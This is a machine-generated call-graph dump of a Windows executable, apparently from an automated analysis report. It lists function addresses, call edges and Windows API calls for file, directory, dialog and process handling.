26244 7ff6ca9d638d 26238->26244 26240 7ff6ca9c13a4 33 API calls 26239->26240 26241 7ff6ca9d631b GetCurrentDirectoryW 26240->26241 26242 7ff6ca9d6341 26241->26242 26243 7ff6ca9c20b0 33 API calls 26242->26243 26245 7ff6ca9d634f 26243->26245 26244->25632 26245->26244 26246 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26245->26246 26247 7ff6ca9d63a9 26246->26247 26249 7ff6ca9c2527 26248->26249 26250 7ff6ca9c252a SetWindowTextW 26248->26250 26249->26250 26251 7ff6caa2e2e0 26250->26251 26252->25638 26253->25654 26254->25663 26255->25700 26257 7ff6ca9c13a4 33 API calls 26256->26257 26258 7ff6ca9d6489 26257->26258 26259 7ff6ca9d648c GetModuleFileNameW 26258->26259 26262 7ff6ca9d64dc 26258->26262 26260 7ff6ca9d64de 26259->26260 26261 7ff6ca9d64a7 26259->26261 26260->26262 26261->26258 26263 7ff6ca9c129c 33 API calls 26262->26263 26265 7ff6ca9d6506 26263->26265 26264 7ff6ca9d653e 26264->25775 26265->26264 26266 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26265->26266 26267 7ff6ca9d6560 26266->26267 26268->25789 26270 7ff6ca9c20f6 26269->26270 26272 7ff6ca9c20cb BuildCatchObjectHelperInternal 26269->26272 27868 7ff6ca9c1474 33 API calls 3 library calls 26270->27868 26272->25809 26273->25821 26274->25834 26275->25842 26276->25849 26277->25856 26279 7ff6ca9f3620 26278->26279 26279->25860 26279->26279 26280->25778 26282 7ff6ca9c1177 26281->26282 26283 7ff6ca9c2034 33 API calls 26282->26283 26284 7ff6ca9c1185 BuildCatchObjectHelperInternal 26283->26284 26284->25792 26287 7ff6ca9c2085 26286->26287 26289 7ff6ca9c2059 BuildCatchObjectHelperInternal 26286->26289 27869 7ff6ca9c15b8 33 API calls 3 library calls 26287->27869 26289->25763 26290->25815 26293 7ff6ca9ce1b2 26291->26293 26292 7ff6ca9ce1b8 BuildCatchObjectHelperInternal 26292->25882 26293->26292 26295 7ff6ca9ce340 26293->26295 26297 7ff6ca9ce2bc 26293->26297 26299 7ff6ca9ce345 26293->26299 27870 7ff6ca9c1f80 33 API calls 3 library calls 26295->27870 26297->26292 26300 7ff6ca9f21d0 33 API calls 26297->26300 27871 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26299->27871 26300->26292 26301->25906 26302->25933 26328 7ff6ca9d3e28 26303->26328 26306 7ff6ca9e0f68 WideCharToMultiByte 26307 7ff6ca9da519 26306->26307 26308 7ff6ca9da589 26307->26308 26322 7ff6ca9d9800 31 API calls 26307->26322 26325 7ff6ca9da56a SetDlgItemTextW 26307->26325 26332 7ff6ca9d9408 26308->26332 26311 7ff6ca9da603 26314 7ff6ca9da6c2 26311->26314 26315 7ff6ca9da60c GetWindowLongPtrW 26311->26315 26312 7ff6ca9da6f2 GetSystemMetrics GetWindow 26313 7ff6ca9da821 26312->26313 26326 7ff6ca9da71d 26312->26326 26318 7ff6ca9f2320 _handle_error 8 API calls 26313->26318 26347 7ff6ca9d95a8 26314->26347 26316 7ff6caa2e2c0 26315->26316 26320 7ff6ca9da6aa GetWindowRect 26316->26320 26319 7ff6ca9da830 26318->26319 26319->25946 26320->26314 26322->26307 26323 7ff6ca9da6e5 SetWindowTextW 26323->26312 26324 7ff6ca9da73e GetWindowRect 26324->26326 26325->26307 26326->26313 26326->26324 26327 7ff6ca9da800 GetWindow 26326->26327 26327->26313 26327->26326 26329 7ff6ca9d3e4d _snwprintf 26328->26329 26330 7ff6ca9f9ef0 swprintf 46 API calls 26329->26330 26331 7ff6ca9d3e69 26330->26331 26331->26306 26333 7ff6ca9d95a8 47 API calls 26332->26333 26337 7ff6ca9d944f 26333->26337 26334 7ff6ca9d955a 26335 7ff6ca9f2320 _handle_error 8 API calls 26334->26335 26336 7ff6ca9d958e GetWindowRect GetClientRect 26335->26336 26336->26311 26336->26312 26337->26334 26338 7ff6ca9c129c 33 API calls 26337->26338 26339 7ff6ca9d949c 26338->26339 26340 7ff6ca9d95a1 26339->26340 26341 7ff6ca9c129c 33 API calls 26339->26341 26342 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26340->26342 26344 7ff6ca9d9514 26341->26344 26343 7ff6ca9d95a7 26342->26343 26344->26334 26345 7ff6ca9d959c 26344->26345 26346 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26345->26346 26346->26340 26348 7ff6ca9d3e28 swprintf 46 API calls 26347->26348 26349 7ff6ca9d95eb 26348->26349 26350 7ff6ca9e0f68 WideCharToMultiByte 26349->26350 26351 7ff6ca9d9603 26350->26351 26352 7ff6ca9d9800 31 API calls 26351->26352 26353 7ff6ca9d961b 26352->26353 26354 7ff6ca9f2320 _handle_error 8 API calls 26353->26354 26355 7ff6ca9d962b 26354->26355 26355->26312 26355->26323 26368 7ff6ca9c13a4 26356->26368 26359 7ff6ca9c2494 26360 7ff6ca9c129c 33 API calls 26359->26360 26361 7ff6ca9c24a2 26360->26361 26362 7ff6ca9c24dd 26361->26362 26365 7ff6ca9c2505 26361->26365 26363 7ff6ca9f2320 _handle_error 8 API calls 26362->26363 26364 7ff6ca9c24f3 26363->26364 26364->25954 26366 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26365->26366 26367 7ff6ca9c250a 26366->26367 26369 7ff6ca9c13ad 26368->26369 26377 7ff6ca9c142d GetWindowTextW 26368->26377 26370 7ff6ca9c143d 26369->26370 26372 7ff6ca9c13ce 26369->26372 26379 7ff6ca9c2018 33 API calls std::_Xinvalid_argument 26370->26379 26374 7ff6ca9f21d0 33 API calls 26372->26374 26375 7ff6ca9c13db __scrt_get_show_window_mode 26372->26375 26374->26375 26378 7ff6ca9c197c 31 API calls _invalid_parameter_noinfo_noreturn 26375->26378 26377->26359 26378->26377 26380->25966 26383 7ff6ca9eae80 GetDlgItem 26382->26383 26384 7ff6ca9eae3c GetMessageW 26382->26384 26383->25977 26383->25978 26385 7ff6ca9eae6a TranslateMessage DispatchMessageW 26384->26385 26386 7ff6ca9eae5b IsDialogMessageW 26384->26386 26385->26383 26386->26383 26386->26385 26388 7ff6ca9d32e4 26387->26388 26389 7ff6ca9d32e7 GetFileAttributesW 26387->26389 26388->26389 26390 7ff6ca9d32f8 26389->26390 26397 7ff6ca9d3375 26389->26397 26401 7ff6ca9d6a0c 26390->26401 26392 7ff6ca9f2320 _handle_error 8 API calls 26393 7ff6ca9d32b1 26392->26393 26393->25712 26393->25991 26395 7ff6ca9d3323 GetFileAttributesW 26396 7ff6ca9d333c 26395->26396 26396->26397 26398 7ff6ca9d3399 26396->26398 26397->26392 26399 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26398->26399 26400 7ff6ca9d339e 26399->26400 26402 7ff6ca9d6a4b 26401->26402 26421 7ff6ca9d6a44 26401->26421 26404 7ff6ca9c129c 33 API calls 26402->26404 26403 7ff6ca9f2320 _handle_error 8 API calls 26405 7ff6ca9d331f 26403->26405 26406 7ff6ca9d6a76 26404->26406 26405->26395 26405->26396 26407 7ff6ca9d6a96 26406->26407 26408 7ff6ca9d6cc7 26406->26408 26410 7ff6ca9d6ab0 26407->26410 26433 7ff6ca9d6b49 26407->26433 26409 7ff6ca9d62dc 35 API calls 26408->26409 26414 7ff6ca9d6ce6 26409->26414 26411 7ff6ca9d70ab 26410->26411 26474 7ff6ca9cc098 26410->26474 26493 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26411->26493 26413 7ff6ca9d6eef 26417 7ff6ca9d70cf 26413->26417 26423 7ff6ca9cc098 33 API calls 26413->26423 26414->26413 26418 7ff6ca9d6d1b 26414->26418 26472 7ff6ca9d6b44 26414->26472 26415 7ff6ca9d70b1 26425 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26415->26425 26496 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26417->26496 26424 7ff6ca9d70bd 26418->26424 26430 7ff6ca9cc098 33 API calls 26418->26430 26419 7ff6ca9d70d5 26426 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26419->26426 26421->26403 26422 7ff6ca9d6b03 26434 7ff6ca9c1fa0 31 API calls 26422->26434 26440 7ff6ca9d6b15 BuildCatchObjectHelperInternal 26422->26440 26428 7ff6ca9d6f56 26423->26428 26494 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26424->26494 26431 7ff6ca9d70b7 26425->26431 26432 7ff6ca9d70db 26426->26432 26427 7ff6ca9d70a6 26438 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26427->26438 26491 7ff6ca9c11cc 33 API calls BuildCatchObjectHelperInternal 26428->26491 26448 7ff6ca9d6d76 BuildCatchObjectHelperInternal 26430->26448 26442 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26431->26442 26444 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26432->26444 26439 7ff6ca9c129c 33 API calls 26433->26439 26433->26472 26434->26440 26436 7ff6ca9d70c3 26447 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26436->26447 26437 7ff6ca9c1fa0 31 API calls 26437->26472 26438->26411 26445 7ff6ca9d6bbe 26439->26445 26440->26437 26441 7ff6ca9d6f69 26492 7ff6ca9d57ac 33 API calls BuildCatchObjectHelperInternal 26441->26492 26442->26424 26443 7ff6ca9c1fa0 31 API calls 26457 7ff6ca9d6df5 26443->26457 26449 7ff6ca9d70e1 26444->26449 26482 7ff6ca9d5820 26445->26482 26451 7ff6ca9d70c9 26447->26451 26448->26436 26448->26443 26495 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26451->26495 26454 7ff6ca9c1fa0 31 API calls 26456 7ff6ca9d6fec 26454->26456 26455 7ff6ca9ce164 33 API calls 26464 7ff6ca9d6be9 BuildCatchObjectHelperInternal 26455->26464 26459 7ff6ca9c1fa0 31 API calls 26456->26459 26463 7ff6ca9d6e21 26457->26463 26490 7ff6ca9c1744 33 API calls 4 library calls 26457->26490 26458 7ff6ca9d6f79 BuildCatchObjectHelperInternal 26458->26432 26458->26454 26462 7ff6ca9d6ff6 26459->26462 26461 7ff6ca9c1fa0 31 API calls 26465 7ff6ca9d6c6d 26461->26465 26466 7ff6ca9c1fa0 31 API calls 26462->26466 26463->26451 26467 7ff6ca9c129c 33 API calls 26463->26467 26464->26431 26464->26461 26469 7ff6ca9c1fa0 31 API calls 26465->26469 26466->26472 26468 7ff6ca9d6ec2 26467->26468 26470 7ff6ca9c2034 33 API calls 26468->26470 26469->26472 26471 7ff6ca9d6edf 26470->26471 26473 7ff6ca9c1fa0 31 API calls 26471->26473 26472->26415 26472->26419 26472->26421 26472->26427 26473->26472 26475 7ff6ca9cc0e5 26474->26475 26479 7ff6ca9cc0fa BuildCatchObjectHelperInternal 26474->26479 26476 7ff6ca9cc1a5 26475->26476 26477 7ff6ca9cc12c 26475->26477 26475->26479 26497 7ff6ca9c1f80 33 API calls 3 library calls 26476->26497 26477->26479 26481 7ff6ca9f21d0 33 API calls 26477->26481 26479->26422 26480 7ff6ca9cc1aa 26481->26479 26483 7ff6ca9d5849 26482->26483 26484 7ff6ca9d589e 26483->26484 26485 7ff6ca9d585b 26483->26485 26498 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 26484->26498 26487 7ff6ca9cc098 33 API calls 26485->26487 26489 7ff6ca9d5886 26487->26489 26489->26455 26490->26463 26491->26441 26492->26458 26495->26417 26497->26480 26501 7ff6ca9d36b3 26499->26501 26500 7ff6ca9d36e0 26503 7ff6ca9d32bc 51 API calls 26500->26503 26501->26500 26502 7ff6ca9d36cc CreateDirectoryW 26501->26502 26502->26500 26504 7ff6ca9d377d 26502->26504 26505 7ff6ca9d36ee 26503->26505 26506 7ff6ca9d378d 26504->26506 26519 7ff6ca9d3d34 26504->26519 26507 7ff6ca9d3791 GetLastError 26505->26507 26509 7ff6ca9d6a0c 49 API calls 26505->26509 26510 7ff6ca9f2320 _handle_error 8 API calls 26506->26510 26507->26506 26511 7ff6ca9d371c 26509->26511 26512 7ff6ca9d37b9 26510->26512 26513 7ff6ca9d3720 CreateDirectoryW 26511->26513 26514 7ff6ca9d373b 26511->26514 26512->26016 26513->26514 26515 7ff6ca9d3774 26514->26515 26516 7ff6ca9d37ce 26514->26516 26515->26504 26515->26507 26517 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26516->26517 26518 7ff6ca9d37d3 26517->26518 26520 7ff6ca9d3d5e SetFileAttributesW 26519->26520 26521 7ff6ca9d3d5b 26519->26521 26522 7ff6ca9d3d74 26520->26522 26530 7ff6ca9d3df5 26520->26530 26521->26520 26523 7ff6ca9d6a0c 49 API calls 26522->26523 26525 7ff6ca9d3d99 26523->26525 26524 7ff6ca9f2320 _handle_error 8 API calls 26526 7ff6ca9d3e0a 26524->26526 26527 7ff6ca9d3dbc 26525->26527 26528 7ff6ca9d3d9d SetFileAttributesW 26525->26528 26526->26506 26529 7ff6ca9d3e1a 26527->26529 26527->26530 26528->26527 26531 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26529->26531 26530->26524 26532 7ff6ca9d3e1f 26531->26532 26534 7ff6ca9c7206 26533->26534 26535 7ff6ca9c713b 26533->26535 26543 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26534->26543 26541 7ff6ca9c714b BuildCatchObjectHelperInternal 26535->26541 26542 7ff6ca9c3f48 33 API calls 2 library calls 26535->26542 26538 7ff6ca9c7273 26538->26032 26539 7ff6ca9c720b 26539->26538 26544 7ff6ca9c889c 8 API calls BuildCatchObjectHelperInternal 26539->26544 26541->26032 26542->26541 26543->26539 26544->26539 26546 7ff6ca9d20ea 26545->26546 26547 7ff6ca9d2102 26545->26547 26546->26547 26549 7ff6ca9d20f6 CloseHandle 26546->26549 26548 7ff6ca9d2126 26547->26548 26551 7ff6ca9cb544 99 API calls 26547->26551 26548->26051 26549->26547 26551->26548 26553 7ff6ca9eaa2f 26552->26553 26554 7ff6ca9eaa36 26552->26554 26553->26197 26554->26553 26657 7ff6ca9c1744 33 API calls 4 library calls 26554->26657 26556->26197 26561 7ff6ca9ef529 __scrt_get_show_window_mode 26557->26561 26573 7ff6ca9ef87d 26557->26573 26558 7ff6ca9c1fa0 31 API calls 26559 7ff6ca9ef89c 26558->26559 26560 7ff6ca9f2320 _handle_error 8 API calls 26559->26560 26562 7ff6ca9ef8a8 26560->26562 26563 7ff6ca9ef684 26561->26563 26664 7ff6ca9e13c4 CompareStringW 26561->26664 26562->26143 26565 7ff6ca9c129c 33 API calls 26563->26565 26566 7ff6ca9ef6c0 26565->26566 26567 7ff6ca9d32a8 51 API calls 26566->26567 26568 7ff6ca9ef6ca 26567->26568 26569 7ff6ca9c1fa0 31 API calls 26568->26569 26574 7ff6ca9ef6d5 26569->26574 26570 7ff6ca9ef742 ShellExecuteExW 26571 7ff6ca9ef755 26570->26571 26572 7ff6ca9ef846 26570->26572 26575 7ff6ca9ef774 IsWindowVisible 26571->26575 26576 7ff6ca9ef78e WaitForInputIdle 26571->26576 26579 7ff6ca9ef7e3 CloseHandle 26571->26579 26572->26573 26582 7ff6ca9ef8fb 26572->26582 26573->26558 26574->26570 26577 7ff6ca9c129c 33 API calls 26574->26577 26575->26576 26580 7ff6ca9ef781 ShowWindow 26575->26580 26658 7ff6ca9efe24 26576->26658 26578 7ff6ca9ef717 26577->26578 26665 7ff6ca9d5b60 53 API calls 2 library calls 26578->26665 26585 7ff6ca9ef801 26579->26585 26586 7ff6ca9ef7f2 26579->26586 26580->26576 26584 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26582->26584 26589 7ff6ca9ef900 26584->26589 26585->26572 26595 7ff6ca9ef837 ShowWindow 26585->26595 26666 7ff6ca9e13c4 CompareStringW 26586->26666 26587 7ff6ca9ef7a6 26587->26579 26591 7ff6ca9ef7b4 GetExitCodeProcess 26587->26591 26588 7ff6ca9ef725 26592 7ff6ca9c1fa0 31 API calls 26588->26592 26591->26579 26593 7ff6ca9ef7c7 26591->26593 26594 7ff6ca9ef72f 26592->26594 26593->26579 26594->26570 26595->26572 26596->26197 26597->26197 26598->26197 26599->26200 26600->26197 26601->26197 26603->26139 26604->26197 26605->26197 26606->26197 26607->26197 26609 7ff6ca9d72ea 26608->26609 26667 7ff6ca9cb3a8 26609->26667 26612->26197 26614 7ff6ca9d31e4 26613->26614 26615 7ff6ca9d31e7 DeleteFileW 26613->26615 26614->26615 26616 7ff6ca9d31fd 26615->26616 26623 7ff6ca9d327c 26615->26623 26617 7ff6ca9d6a0c 49 API calls 26616->26617 26619 7ff6ca9d3222 26617->26619 26618 7ff6ca9f2320 _handle_error 8 API calls 26620 7ff6ca9d3291 26618->26620 26621 7ff6ca9d3226 DeleteFileW 26619->26621 26622 7ff6ca9d3243 26619->26622 26620->26197 26621->26622 26622->26623 26624 7ff6ca9d32a1 26622->26624 26623->26618 26625 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26624->26625 26626 7ff6ca9d32a6 26625->26626 26628->26197 26629->26197 26630->26197 26631->26197 26633 7ff6ca9d7e0c 26632->26633 26634 7ff6ca9d7e23 26633->26634 26635 7ff6ca9d7e55 26633->26635 26637 7ff6ca9c129c 33 API calls 26634->26637 26671 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26635->26671 26639 7ff6ca9d7e47 26637->26639 26638 7ff6ca9d7e5a 26639->26197 26640->26197 26641->26197 26644 7ff6ca9dd25e 26642->26644 26643 7ff6ca9dd292 26643->26194 26644->26643 26645 7ff6ca9c1744 33 API calls 26644->26645 26645->26644 26646->26092 26647->26081 26649->26061 26650->26064 26651->26066 26652->26122 26653->26110 26655->26116 26657->26554 26659 7ff6ca9efe77 WaitForSingleObject 26658->26659 26660 7ff6ca9efe2f PeekMessageW 26659->26660 26661 7ff6ca9efe89 26659->26661 26662 7ff6ca9efe74 26660->26662 26663 7ff6ca9efe4b GetMessageW TranslateMessage DispatchMessageW 26660->26663 26661->26587 26662->26659 26663->26662 26664->26563 26665->26588 26666->26585 26670 7ff6ca9cb3f2 __scrt_get_show_window_mode 26667->26670 26668 7ff6ca9f2320 _handle_error 8 API calls 26669 7ff6ca9cb4b6 26668->26669 26669->26197 26670->26668 26671->26638 26728 7ff6ca9d86ec 26672->26728 26674 7ff6ca9ce3c4 26734 7ff6ca9ce600 26674->26734 26676 7ff6ca9ce4d4 26678 7ff6ca9f21d0 33 API calls 26676->26678 26677 7ff6ca9ce454 26677->26676 26679 7ff6ca9ce549 26677->26679 26680 7ff6ca9ce4f0 26678->26680 26681 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26679->26681 26740 7ff6ca9e3148 102 API calls 26680->26740 26682 7ff6ca9ce54e 26681->26682 26686 7ff6ca9d18c2 26682->26686 26688 7ff6ca9d190d 26682->26688 26690 7ff6ca9c1fa0 31 API calls 26682->26690 26684 7ff6ca9ce51d 26685 7ff6ca9f2320 _handle_error 8 API calls 26684->26685 26687 7ff6ca9ce52d 26685->26687 26686->26688 26689 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26686->26689 26687->26211 26688->26211 26691 7ff6ca9d193b 26689->26691 26690->26682 26693 7ff6ca9ce7ea 26692->26693 26694 7ff6ca9ce864 26693->26694 26697 7ff6ca9ce8a1 26693->26697 26741 7ff6ca9d3ec8 26693->26741 26696 7ff6ca9ce993 26694->26696 26694->26697 26698 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26696->26698 26704 7ff6ca9ce900 26697->26704 26748 7ff6ca9cf578 26697->26748 26702 7ff6ca9ce998 26698->26702 26699 7ff6ca9ce955 26701 7ff6ca9f2320 _handle_error 8 API calls 26699->26701 26703 7ff6ca9ce97e 26701->26703 26706 7ff6ca9ce578 26703->26706 26704->26699 26784 7ff6ca9c28a4 82 API calls 2 library calls 26704->26784 27839 7ff6ca9d15d8 26706->27839 26709 7ff6ca9ce59e 26711 7ff6ca9c1fa0 31 API calls 26709->26711 26710 7ff6ca9e1870 108 API calls 26710->26709 26712 7ff6ca9ce5b7 26711->26712 26713 7ff6ca9c1fa0 31 API calls 26712->26713 26714 7ff6ca9ce5c3 26713->26714 26715 7ff6ca9c1fa0 31 API calls 26714->26715 26716 7ff6ca9ce5cf 26715->26716 26717 7ff6ca9d878c 108 API calls 26716->26717 26718 7ff6ca9ce5db 26717->26718 26719 7ff6ca9c1fa0 31 API calls 26718->26719 26720 7ff6ca9ce5e4 26719->26720 26721 7ff6ca9c1fa0 31 API calls 26720->26721 26725 7ff6ca9ce5ed 26721->26725 26722 7ff6ca9d18c2 26724 7ff6ca9d190d 26722->26724 26726 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26722->26726 26723 7ff6ca9c1fa0 31 API calls 26723->26725 26724->26215 26725->26722 26725->26723 26725->26724 26727 7ff6ca9d193b 26726->26727 26729 7ff6ca9d870a 26728->26729 26730 7ff6ca9f21d0 33 API calls 26729->26730 26731 7ff6ca9d872f 26730->26731 26732 7ff6ca9f21d0 33 API calls 26731->26732 26733 7ff6ca9d8759 26732->26733 26733->26674 26735 7ff6ca9ce62c BuildCatchObjectHelperInternal 26734->26735 26736 7ff6ca9ce627 26734->26736 26737 7ff6ca9ce668 BuildCatchObjectHelperInternal 26735->26737 26739 7ff6ca9c1fa0 31 API calls 26735->26739 26738 7ff6ca9c1fa0 31 API calls 26736->26738 26737->26677 26738->26735 26739->26737 26740->26684 26742 7ff6ca9d72cc 8 API calls 26741->26742 26743 7ff6ca9d3ee1 26742->26743 26744 7ff6ca9d3f0f 26743->26744 26785 7ff6ca9d40bc 26743->26785 26744->26693 26747 7ff6ca9d3efa FindClose 26747->26744 26749 7ff6ca9cf598 _snwprintf 26748->26749 26824 7ff6ca9c2950 26749->26824 26752 7ff6ca9cf5cc 26757 7ff6ca9cf5fc 26752->26757 26839 7ff6ca9c33e4 26752->26839 26755 7ff6ca9cf5f8 26755->26757 26871 7ff6ca9c3ad8 26755->26871 27090 7ff6ca9c2c54 26757->27090 26765 7ff6ca9cf662 27111 7ff6ca9d7918 48 API calls 2 library calls 26765->27111 26767 7ff6ca9cf677 26768 7ff6ca9d3ec8 55 API calls 26767->26768 26769 7ff6ca9cf6ad 26768->26769 26775 7ff6ca9cf74d 26769->26775 26777 7ff6ca9cf89a 26769->26777 26779 7ff6ca9d3ec8 55 API calls 26769->26779 27112 7ff6ca9d7918 48 API calls 2 library calls 26769->27112 26773 7ff6ca9cf842 26773->26757 26902 7ff6ca9c69f8 26773->26902 26913 7ff6ca9cf930 26773->26913 26775->26777 26778 7ff6ca9cf7cb 26775->26778 26781 7ff6ca9cf895 26775->26781 26780 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26777->26780 26881 7ff6ca9cf8a4 26778->26881 26779->26769 26783 7ff6ca9cf8a0 26780->26783 26782 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26781->26782 26782->26777 26784->26699 26786 7ff6ca9d41d2 FindNextFileW 26785->26786 26787 7ff6ca9d40f9 FindFirstFileW 26785->26787 26789 7ff6ca9d41f3 26786->26789 26790 7ff6ca9d41e1 GetLastError 26786->26790 26787->26789 26791 7ff6ca9d411e 26787->26791 26792 7ff6ca9d4211 26789->26792 26795 7ff6ca9c20b0 33 API calls 26789->26795 26810 7ff6ca9d41c0 26790->26810 26793 7ff6ca9d6a0c 49 API calls 26791->26793 26800 7ff6ca9c129c 33 API calls 26792->26800 26794 7ff6ca9d4144 26793->26794 26797 7ff6ca9d4167 26794->26797 26798 7ff6ca9d4148 FindFirstFileW 26794->26798 26795->26792 26796 7ff6ca9f2320 _handle_error 8 API calls 26799 7ff6ca9d3ef4 26796->26799 26797->26789 26802 7ff6ca9d41af GetLastError 26797->26802 26805 7ff6ca9d4314 26797->26805 26798->26797 26799->26744 26799->26747 26801 7ff6ca9d423b 26800->26801 26811 7ff6ca9d8090 26801->26811 26802->26810 26806 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26805->26806 26807 7ff6ca9d431a 26806->26807 26808 7ff6ca9d430f 26809 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26808->26809 26809->26805 26810->26796 26812 7ff6ca9d80a5 26811->26812 26815 7ff6ca9d8188 26812->26815 26814 7ff6ca9d4249 26814->26808 26814->26810 26816 7ff6ca9d8326 26815->26816 26819 7ff6ca9d81ba 26815->26819 26823 7ff6ca9c704c 47 API calls BuildCatchObjectHelperInternal 26816->26823 26818 7ff6ca9d832b 26821 7ff6ca9d81d4 BuildCatchObjectHelperInternal 26819->26821 26822 7ff6ca9d58a4 33 API calls 2 library calls 26819->26822 26821->26814 26822->26821 26823->26818 26825 7ff6ca9c296c 26824->26825 26826 7ff6ca9d86ec 33 API calls 26825->26826 26827 7ff6ca9c298d 26826->26827 26828 7ff6ca9f21d0 33 API calls 26827->26828 26831 7ff6ca9c2ac2 26827->26831 26829 7ff6ca9c2ab0 26828->26829 26829->26831 27113 7ff6ca9c91c8 26829->27113 27120 7ff6ca9d4d04 26831->27120 26834 7ff6ca9d2ca8 27152 7ff6ca9d24c0 26834->27152 26836 7ff6ca9d2cc5 26836->26752 27171 7ff6ca9d28d0 26839->27171 26840 7ff6ca9c3674 27190 7ff6ca9c28a4 82 API calls 2 library calls 26840->27190 26841 7ff6ca9c3431 __scrt_get_show_window_mode 26848 7ff6ca9c344e 26841->26848 26852 7ff6ca9c3601 26841->26852 27176 7ff6ca9d2bb0 26841->27176 26843 7ff6ca9c69f8 141 API calls 26845 7ff6ca9c3682 26843->26845 26845->26843 26846 7ff6ca9c370c 26845->26846 26845->26852 26866 7ff6ca9d2aa0 101 API calls 26845->26866 26851 7ff6ca9c3740 26846->26851 26846->26852 27191 7ff6ca9c28a4 82 API calls 2 library calls 26846->27191 26848->26840 26848->26845 26849 7ff6ca9c35cb 26849->26848 26850 7ff6ca9c35d7 26849->26850 26850->26852 26854 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26850->26854 26851->26852 26853 7ff6ca9c384d 26851->26853 26868 7ff6ca9d2bb0 101 API calls 26851->26868 26852->26755 26853->26852 26856 7ff6ca9c20b0 33 API calls 26853->26856 26857 7ff6ca9c3891 26854->26857 26855 7ff6ca9c34eb 26855->26849 27185 7ff6ca9d2aa0 26855->27185 26856->26852 26857->26755 26859 7ff6ca9c69f8 141 API calls 26860 7ff6ca9c378e 26859->26860 26860->26859 26861 7ff6ca9c3803 26860->26861 26869 7ff6ca9d2aa0 101 API calls 26860->26869 26864 7ff6ca9d2aa0 101 API calls 26861->26864 26864->26853 26865 7ff6ca9d28d0 104 API calls 26865->26855 26866->26845 26867 7ff6ca9d28d0 104 API calls 26867->26849 26868->26860 26869->26860 26872 7ff6ca9c3af9 26871->26872 26877 7ff6ca9c3b55 26871->26877 27203 7ff6ca9c3378 26872->27203 26874 7ff6ca9f2320 _handle_error 8 API calls 26875 7ff6ca9c3b67 26874->26875 26875->26778 27110 7ff6ca9c8d04 33 API calls 2 library calls 26875->27110 26877->26874 26878 7ff6ca9c3b6c 26879 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 26878->26879 26880 7ff6ca9c3b71 26879->26880 27426 7ff6ca9d886c 26881->27426 26883 7ff6ca9cf8ba 27430 7ff6ca9def60 GetSystemTime SystemTimeToFileTime 26883->27430 26886 7ff6ca9e0994 26887 7ff6ca9f0340 26886->26887 26888 7ff6ca9d7df4 47 API calls 26887->26888 26889 7ff6ca9f0373 26888->26889 26890 7ff6ca9daae0 48 API calls 26889->26890 26891 7ff6ca9f0387 26890->26891 26892 7ff6ca9dda98 48 API calls 26891->26892 26893 7ff6ca9f0397 26892->26893 26894 7ff6ca9c1fa0 31 API calls 26893->26894 26895 7ff6ca9f03a2 26894->26895 27439 7ff6ca9efc68 49 API calls 2 library calls 26895->27439 26897 7ff6ca9f03b8 26898 7ff6ca9c1fa0 31 API calls 26897->26898 26899 7ff6ca9f03c3 26898->26899 26900 7ff6ca9f2320 _handle_error 8 API calls 26899->26900 26901 7ff6ca9f03d0 26900->26901 26901->26773 26903 7ff6ca9c6a0e 26902->26903 26908 7ff6ca9c6a0a 26902->26908 26912 7ff6ca9d2bb0 101 API calls 26903->26912 26904 7ff6ca9c6a1b 26905 7ff6ca9c6a2f 26904->26905 26906 7ff6ca9c6a3e 26904->26906 26905->26908 27440 7ff6ca9c5e24 26905->27440 27523 7ff6ca9c5130 130 API calls 2 library calls 26906->27523 26908->26773 26910 7ff6ca9c6a3c 26910->26908 27524 7ff6ca9c466c 82 API calls 26910->27524 26912->26904 26914 7ff6ca9cf978 26913->26914 26919 7ff6ca9cf9b0 26914->26919 26926 7ff6ca9cfa34 26914->26926 27640 7ff6ca9e612c 146 API calls 3 library calls 26914->27640 26915 7ff6ca9d1189 26917 7ff6ca9d118e 26915->26917 26918 7ff6ca9d11e1 26915->26918 26917->26926 27692 7ff6ca9cdd08 180 API calls 26917->27692 26918->26926 27693 7ff6ca9e612c 146 API calls 3 library calls 26918->27693 26919->26915 26923 7ff6ca9cf9d0 26919->26923 26919->26926 26920 7ff6ca9f2320 _handle_error 8 API calls 26921 7ff6ca9d11c4 26920->26921 26921->26773 26923->26926 27561 7ff6ca9c9bb0 26923->27561 26926->26920 26927 7ff6ca9cfad6 27574 7ff6ca9d5ef8 26927->27574 26931 7ff6ca9cfb7a 27089 7ff6ca9d2aa0 101 API calls 26931->27089 27091 7ff6ca9c2c88 27090->27091 27092 7ff6ca9c2c74 27090->27092 27093 